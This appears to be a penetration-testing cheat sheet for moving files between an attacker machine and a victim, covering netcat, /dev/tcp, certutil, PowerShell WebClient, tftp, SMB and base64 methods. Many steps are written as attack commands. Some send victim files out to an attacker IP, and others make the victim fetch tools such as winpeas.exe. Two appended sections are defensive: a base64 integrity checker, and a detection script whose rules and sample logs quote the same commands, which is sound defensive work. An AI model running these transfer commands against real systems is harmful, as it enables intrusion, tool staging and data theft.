File Transfers and Download

TFTP(WINDOWS)

Attacker:

sudo apt update && sudo apt install atftp
mkdir /tftp
chown nobody: /tftp
atftpd --daemon --port 69 /tftp

Victim (Windows):

tftp -i 192.168.1.2 PUT file1.txt
tftp -i 192.168.1.2 GET file2.txt

From victim's linux machine to our machine quickly

In attacker's machine

nc -lnvp attacker-port > file.extension

In victim machine

cat file_to_transfer.extension > /dev/tcp/attacker-ip/attacker-port

wget

wget can be used both to download a file from the internet and to pull a file from a server we start on the attacker (our) machine, in the same directory where the file is located; the victim machine then downloads the file from that server.

In attacker machine

nc -lnvp 4444 < file.sh

In victim machine

wget http://attacker-machine-ip:4444/file.sh -O /tmp/file.sh

curl

curl can also download a remote file from the internet or transfer files between hosts in the same way as wget. (Below, file.sh is located in the same directory where we start the Python server on port 8080.)

In attacker machine

python3 -m http.server 8080

In victim pc

curl http://attacker-ip:8080/file.sh -o file.sh

axel

axel can also be used to download and transfer files on Linux hosts. Below we start a PHP server on port 8000 in the same directory where our file (file.sh) is located and download the file on the victim PC using axel.

attacker host:

php -S 10.10.11.32:8000

victim host

axel -a -n 20 http://10.10.11.32:8000/file.sh -o /tmp/file.sh

netcat

netcat can transfer files as well as listen for connections; it is basically a Swiss army knife for hacking. Below we transfer winpeas.exe from the attacker machine to the victim machine over port 5555.

In attacker machine

nc -lnvp 5555 < winpeas.exe

In victim host

nc attacker-ip 5555 > winpeas.exe

certutil

On Windows, certutil is a very efficient way to transfer files. Below we start a Python HTTP server on port 9000 in the same directory where our file winpeas.exe is located.

In attacker pc:

python -m SimpleHTTPServer 9000

In victim pc

certutil -urlcache -f -split "http://attacker-ip:9000/winpeas.exe" C:\Windows\Temp\winpeas.exe

powershell

Always use single quotes in PowerShell for both the URL and the output file. When the one-liner is launched from cmd.exe with powershell -c, wrap the whole command in double quotes so cmd does not interpret the parentheses.

In attacker pc

python3 -m http.server 6000

In victim pc

powershell -c "(New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file', 'output-file')"

In victim pc in powershell session:

Invoke-WebRequest -Uri http://attacker-ip:port/file -OutFile .\file

smb

In attacker pc using impacket

python3 /usr/share/doc/python-impacket/examples/smbserver.py hello .

In victim pc:

copy \\ip-addr\hello\nc64.exe nc64-downloaded.exe

hello is the share name (it can be set to any name) and "." is the current directory where our file is located.

Base64 method

We can base64-encode the executable on our attacking machine, paste the encoded string into a text file on the victim machine, and recover the executable by decoding that file on the victim machine.

In attacker machine

python -c 'print(__import__("base64").b64encode(open("file.exe", "rb").read()).decode())'

In victim machine:

echo "encoded-string" > output.txt

In victim machine second step:

base64 -d output.txt > file.exe
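The copy-and-paste transfer above has one failure mode the one-liners do not catch: a paste cut short or reflowed by a terminal decodes into a silently corrupt binary. The following is an added example, not code from the original notes, showing the encode step with line wrapping and a decode step that verifies a SHA-256 digest before the file is accepted. The SAMPLE payload is constructed bytes standing in for file.exe, and the 76-column wrap width is an assumption chosen to match what most editors keep intact.

```python
"""Added example, not part of the original notes: base64 a binary for a
copy-and-paste transfer, then decode the pasted text and verify a
SHA-256 digest so that a truncated or reflowed paste fails loudly instead
of producing a silently corrupt file. The sample payload is constructed
bytes, not a real executable.
"""
import base64
import binascii
import hashlib

LINE_WIDTH = 76  # assumption: wrap so the text survives editors/terminals that reflow long lines


def encode_for_paste(data):
    """Return (wrapped base64 text, hex SHA-256 of the original bytes)."""
    b64 = base64.b64encode(data).decode("ascii")  # .decode() avoids Python 3's b'...' wrapper
    wrapped = "\n".join(b64[i:i + LINE_WIDTH] for i in range(0, len(b64), LINE_WIDTH))
    return wrapped, hashlib.sha256(data).hexdigest()


def decode_and_verify(text, expected_sha256):
    """Decode pasted text (any whitespace is tolerated) and check the digest.

    Raises binascii.Error on malformed base64 and ValueError on a digest mismatch.
    """
    raw = base64.b64decode("".join(text.split()), validate=True)
    actual = hashlib.sha256(raw).hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"digest mismatch: got {actual}, expected {expected_sha256}")
    return raw


def roundtrip(data):
    """True if data survives encode -> paste -> decode intact."""
    text, digest = encode_for_paste(data)
    return decode_and_verify(text, digest) == data


def truncated_paste_is_rejected(data, drop=8):
    """True if cutting the last `drop` characters off the paste is caught by the check."""
    text, digest = encode_for_paste(data)
    try:
        decode_and_verify(text[:-drop], digest)
    except (binascii.Error, ValueError):
        return True
    return False


# Constructed sample payload: a small byte pattern standing in for file.exe.
SAMPLE = bytes(range(256)) * 10

if __name__ == "__main__":
    text, digest = encode_for_paste(SAMPLE)
    print(f"{len(text.splitlines())} lines of base64, sha256={digest}")
    print("roundtrip ok:", roundtrip(SAMPLE))
    print("truncation detected:", truncated_paste_is_rejected(SAMPLE))
```

The digest is computed before encoding and carried alongside the text, so the receiving side can compare it with the output of sha256sum on the decoded file; a mismatch means the paste should be redone rather than the file run.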

scp file transfer

Copying a local file to a remote server:

scp file.txt remote_username@10.10.0.2:/tmp/file.txt

Copying a remote file to the local machine:

scp remote_username@10.10.0.2:/remote/binary.exe /local/directory

Rsync file transfer

Copying a local file or directory to a remote machine:

rsync -av /path/to/mydirectory user@host:/path/to/upload/directory

Copying a remote file or directory to the local machine:

rsync -avz user@host:/path/to/mydirectory-or-file ~/myfolder/

ftp(For file download to local pc)

In attacker pc:

python -m pyftpdlib -p 21 --write

In victim pc:

ftp attacker-ip

Log in with username anonymous and password anonymous, then run put file.exe from the victim machine. The file is saved on the attacker machine automatically, and the path where it was saved is shown in the attacker machine's output.

Powershell webclient method(from victim windows to attacker's linux)

In attacker pc:

nc -lnvp 4444 > winpeas-result.out

In victim machine from powershell session:

$webclient = New-Object System.Net.WebClient;$webclient.UploadFile('http://attacker-ip:4444/','winpeas-result.out')
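The certutil, PowerShell, tftp, /dev/tcp and netcat commands in these notes are also what a blue team looks for in process command-line telemetry. The following is an added example, not part of the original notes, that scans command-line log records for those exact tool-and-flag combinations while leaving ordinary uses of the same tools (certutil -verify, a plain wget) alone. The record layout (timestamp host= user= cmd=), the host and user names, and the 203.0.113.5 address are all constructed for the example and do not correspond to any real log format or system.

```python
"""Added example, not part of the original notes: flag command-line log
records that match the transfer techniques listed on this page
(certutil -urlcache, PowerShell WebClient / Invoke-WebRequest, tftp -i,
bash /dev/tcp redirection, netcat with shell redirection).

The record layout, host/user names and the 203.0.113.5 address are
constructed for the example.
"""
import re
from dataclasses import dataclass

# (rule name, pattern, severity). Each pattern keys on the tool *and* the flag or
# redirection used for transfer, so ordinary certutil/nc usage is not flagged.
RULES = [
    ("certutil_urlcache",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I), "high"),
    ("powershell_webclient",
     re.compile(r"Net\.WebClient\b.*\.(DownloadFile|DownloadString|UploadFile)\(", re.I), "high"),
    ("powershell_iwr",
     re.compile(r"\b(Invoke-WebRequest|iwr)\b.*-OutFile\b", re.I), "medium"),
    ("tftp_transfer",
     re.compile(r"\btftp(\.exe)?\s+-i\b.*\b(GET|PUT)\b", re.I), "high"),
    ("bash_dev_tcp",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"), "high"),
    ("netcat_redirect",
     re.compile(r"\b(nc|ncat|netcat)\b[^|;]*[<>]\s*\S+", re.I), "medium"),
]

# Assumed record layout: "<timestamp> host=<name> user=<name> cmd=<command line>"
RECORD = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


@dataclass
class Alert:
    timestamp: str
    host: str
    user: str
    rule: str
    severity: str
    command: str


def parse_record(line):
    """Return the record's fields as a dict, or None for lines that do not fit the layout."""
    m = RECORD.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Return one Alert per (record, rule) match, in input order; unparseable lines are skipped."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        for name, pattern, severity in RULES:
            if pattern.search(rec["cmd"]):
                alerts.append(Alert(rec["ts"], rec["host"], rec["user"], name, severity, rec["cmd"]))
    return alerts


# Constructed sample records: six transfer attempts mixed with benign activity and one malformed line.
SAMPLE_LOG = [
    r'2024-05-01T09:12:03Z host=WS01 user=jdoe cmd=certutil -urlcache -f -split "http://203.0.113.5:9000/winpeas.exe" C:\Windows\Temp\winpeas.exe',
    r'''2024-05-01T09:12:41Z host=WS01 user=jdoe cmd=powershell -c "(New-Object Net.WebClient).DownloadFile('http://203.0.113.5:6000/file', 'out')"''',
    r'2024-05-01T09:15:10Z host=WS01 user=jdoe cmd=certutil -verify C:\certs\corp.cer',
    r'2024-05-01T09:20:22Z host=WS02 user=asmith cmd=powershell Invoke-WebRequest -Uri http://203.0.113.5:8080/file -OutFile .\file',
    r'2024-05-01T09:31:07Z host=WS02 user=asmith cmd=tftp -i 203.0.113.5 PUT file1.txt',
    r'2024-05-01T09:40:55Z host=srv-web user=www-data cmd=bash -c "cat /var/log/app.log > /dev/tcp/203.0.113.5/4444"',
    r'2024-05-01T09:42:13Z host=srv-web user=www-data cmd=nc 203.0.113.5 5555 > winpeas.exe',
    r'2024-05-01T09:50:00Z host=srv-web user=deploy cmd=wget https://mirror.example.org/pkg.tar.gz',
    "not a well-formed record",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a.severity}] {a.timestamp} {a.host} {a.user} {a.rule}: {a.command}")
```

The patterns are intentionally narrow: certutil is only flagged together with -urlcache and a URL, and nc only when a shell redirection follows it, which keeps certificate maintenance and port checks out of the alert stream. In a real deployment the same rules would run over Sysmon event 1 / auditd execve command lines rather than this constructed layout.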